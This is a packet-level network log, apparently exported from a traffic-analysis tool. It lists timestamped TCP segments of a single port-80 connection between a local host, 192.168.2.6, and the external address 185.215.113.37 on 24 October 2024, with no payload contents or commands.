Oct 24, 2024 13:02:14.583376884 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.583391905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.583400965 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.583417892 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.583429098 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.583446980 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.583460093 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.583472013 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.583492994 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.583513021 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.584286928 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.584316015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.584336042 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.584345102 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.584353924 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.584372997 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.584389925 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.584397078 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.584419966 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.584443092 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.585304976 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.585325956 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.585349083 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.585369110 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.585381031 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.585392952 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.585418940 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.586280107 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.586301088 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.586324930 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.586332083 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.586347103 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.586365938 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.586378098 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.586390972 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.586410046 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.586417913 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.586426973 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.586447954 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.587254047 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.587274075 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.587290049 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.587301970 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.587327003 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.587341070 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.587352037 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.587369919 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.587383986 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.587410927 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.588238955 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.588258982 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.588277102 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.588284969 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.588305950 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.588315964 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.588326931 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.588342905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.588351965 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.588381052 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.589015007 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.589030981 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.589061975 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.589068890 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.589077950 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.589090109 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.589118958 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.589131117 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.619398117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.619446039 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.619468927 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.619494915 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.619529009 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.619856119 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.619872093 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.619899035 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.619913101 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.619926929 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.619935989 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.619954109 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.619966984 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.620001078 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.620553017 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.620567083 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.620599985 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.620600939 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.620618105 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.620628119 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.620637894 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.620784998 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.630049944 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.630105972 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.630120039 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.630134106 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.630201101 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.699155092 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.699223042 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.699263096 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.699284077 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.699309111 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.699326038 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.699517012 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.699596882 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.699628115 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.699645996 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.699676991 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.699701071 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.700020075 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.700036049 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.700063944 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.700073957 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.700093031 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.700107098 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.700141907 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.700746059 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.700766087 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.700781107 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.700794935 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.700810909 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.700830936 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.700838089 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.700856924 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.700870037 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.700886965 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.700896025 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.700913906 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.700931072 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.700953007 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.701828003 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.701843977 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.701869011 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.701878071 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.701894999 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.701908112 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.701917887 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.701937914 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.701953888 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.701981068 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.702416897 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.702435970 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.702461004 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.702467918 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.702477932 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.702491045 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.702505112 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.702519894 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.702531099 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.702560902 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.703407049 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.703433037 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.703464031 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.703480959 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.703488111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.703501940 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.703516006 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.703536034 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.703542948 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.703552008 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.703571081 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.704420090 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.704436064 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.704463005 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.704473972 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.704493046 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.704513073 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.704534054 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.704534054 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.704534054 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.704545975 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.704554081 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.704571962 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.704612017 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.705481052 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.705497980 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.705528021 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.705535889 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.705555916 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.705564022 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.705564022 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.705581903 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.705591917 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.705610037 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.705619097 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.705646992 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.706350088 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.706370115 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.706398010 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.706404924 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.706413031 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.706433058 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.706439018 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.706451893 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.706476927 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.706492901 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.738388062 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.738447905 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.738473892 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.738501072 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.738548040 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.738863945 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.738884926 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.738903046 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.738926888 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.738939047 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.738955975 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.738969088 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.738996983 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.739604950 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.739635944 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.739650965 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.739665031 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.739684105 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.739692926 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.739722013 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.748991966 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.749056101 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.749186993 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.749238968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.749357939 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.749411106 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.749438047 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.749465942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.749490976 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.749504089 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.817976952 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.818012953 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.818034887 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.818089008 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.818231106 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.818253040 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.818294048 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.818599939 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.818620920 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.818635941 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.818644047 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.818650007 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.818749905 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.819020987 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.819041967 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.819062948 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.819080114 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.819108963 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.819540977 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.819555044 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.819578886 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.819588900 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.819601059 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.819610119 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.819617987 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.819636106 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.819653034 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.819678068 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.819715023 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.820238113 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.820255041 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.820277929 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.820287943 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.820311069 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.820317030 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.820329905 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.820338964 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.820348978 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.820363045 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.820383072 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.820400953 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.821149111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.821165085 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.821194887 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.821211100 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.821218014 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.821234941 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.821250916 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.821264982 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.821281910 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.821289062 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.821305037 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.821327925 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.822072983 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.822093964 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.822110891 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.822128057 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.822140932 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.822154999 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.822168112 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.822177887 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.822190046 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.822208881 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.822216034 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.822227955 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.822241068 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.822999001 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.823019981 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.823034048 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.823065996 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.823076963 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.823085070 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.823096991 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.823113918 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.823142052 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.823904991 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.823925972 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.823944092 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.823964119 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.823981047 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.823987961 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.824006081 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.824023962 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.824033022 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.824049950 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.824074030 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.824765921 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.824789047 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.824806929 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.824819088 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.824836016 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.824847937 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.824856997 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.824871063 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.824896097 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.857161999 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.857186079 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.857225895 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.857248068 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.857462883 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.857481956 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.857506037 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.857521057 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.857553005 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.857893944 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.857922077 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.857939005 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.857947111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:14.857956886 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:14.857980967 CEST	80	49711	185.215.113.37	192.168.2.6
